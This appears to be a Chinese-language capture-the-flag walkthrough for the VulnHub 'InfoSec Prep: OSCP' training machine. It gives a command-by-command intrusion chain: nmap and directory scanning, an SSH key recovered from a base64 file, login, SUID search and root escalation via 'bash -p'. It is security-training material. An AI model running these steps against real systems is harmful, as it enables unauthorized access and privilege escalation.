虚拟机下载地址:https://www.vulnhub.com/entry/infosec-prep-oscp,508/
虚拟机简介:这台机器是为InfoSec Prep Discord 服务器创建的
目标:1个flag
级别:中级
arp-scan 192.168.207.0/24
nmap -A -sS -sV -v -p- 192.168.207.148
查看开放22、80、33060端口
访问站点首页显示OSCP靶机页面
通过dirb进行目录扫描,发现存在WordPress
dirb http://192.168.207.148
使用wpscan未发现有用信息,仅发现一个admin账号
wpscan --url "http://192.168.207.148/" -eu
使用gobuster进行爆破发现存在secret.txt
gobuster dir -u http://192.168.207.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt
访问secret.txt中发现文件内容为base64编码
通过base64解码,发现为SSH密钥
复制解密内容并保存为id_rsa,修改文件权限,并根据站点首页提示仅有一个oscp账号
chmod 600 id_rsa
ssh -i id_rsa [email protected]
find / -perm -u=s -type f 2>/dev/null
通过bash提权已经获取到root权限
bash -p
id
查看FLAG
cat /root/flag.txt